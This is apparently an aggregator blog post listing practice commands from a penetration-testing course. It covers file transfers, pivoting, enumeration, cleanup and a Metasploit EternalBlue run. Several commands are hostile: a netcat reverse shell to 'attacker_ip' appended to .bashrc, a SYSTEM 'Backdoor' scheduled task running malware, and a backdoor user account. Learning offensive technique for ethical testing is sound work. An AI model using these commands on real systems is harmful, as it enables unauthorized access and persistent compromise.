PEH Course 75% Complete: Key Takeaways and Practice Commands

By /

Listen to this Post

In this update, Todd Mattran shares his progress on the Penetration Testing and Ethical Hacking (PEH) course, highlighting key topics covered and practical techniques. Below is a breakdown of the topics and verified commands for hands-on practice.

Topics Covered

1. File Transfers

  • Certutil: 
    certutil -urlcache -split -f http://example.com/file.exe C:\path\to\save\file.exe
  • HTTP Download with PowerShell: 
    Invoke-WebRequest -Uri http://example.com/file.exe -OutFile C:\path\to\save\file.exe
  • Linux File Transfer with wget: 
    wget http://example.com/file.exe -O /path/to/save/file.exe
  • FTP File Transfer: 
    ftp example.com
get file.exe

2. Maintaining Access

  • Persistent Scripts: 
    echo "nc -e /bin/bash attacker_ip 4444" >> ~/.bashrc
  • Scheduled Tasks (Windows): 
    schtasks /create /tn "Backdoor" /tr "C:\path\to\malware.exe" /sc onstart /ru SYSTEM
  • Add User (Linux): 
    useradd -m -s /bin/bash backdooruser
passwd backdooruser

3. Pivoting

  • ProxyChains: 
    proxychains nmap -sT -p 1-100 target_ip
  • SSH Tunneling: 
    ssh -D 1080 user@jump_host
  • NMap Scan Through Pivot: 
    nmap -sT -p 1-100 target_ip --proxies socks4://127.0.0.1:1080
  • xfreerdp: 
    xfreerdp /v:target_ip /u:username /p:password
  • sshuttle: 
    sshuttle -r user@jump_host 192.168.1.0/24

4. Cleaning Up

  • Remove Executables (Linux): 
    rm -f /path/to/malware
  • Remove Scheduled Tasks (Windows): 
    schtasks /delete /tn "Backdoor" /f
  • Revert User Accounts: 
    userdel backdooruser

What Undercode Say

The PEH course provides a comprehensive understanding of penetration testing, from file transfers to pivoting and maintaining access. These techniques are essential for ethical hackers to simulate real-world attacks and secure systems effectively. Below are additional commands and resources to deepen your knowledge:

  • Linux Enumeration: 
    uname -a
cat /etc/passwd
netstat -tuln
  • Windows Enumeration: 
    systeminfo
net user
netstat -ano
  • Web Application Enumeration: 
    nikto -h http://example.com
dirb http://example.com
  • Exploitation: 
    msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
exploit
  • Post-Exploitation: 
    meterpreter > shell
whoami
ipconfig

For further learning, explore these resources:

Mastering these skills requires consistent practice and a deep understanding of both offensive and defensive strategies. Keep exploring, stay curious, and always aim to improve your craft.

This concludes the article. If you have further questions or need additional resources, feel free to reach out!

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts: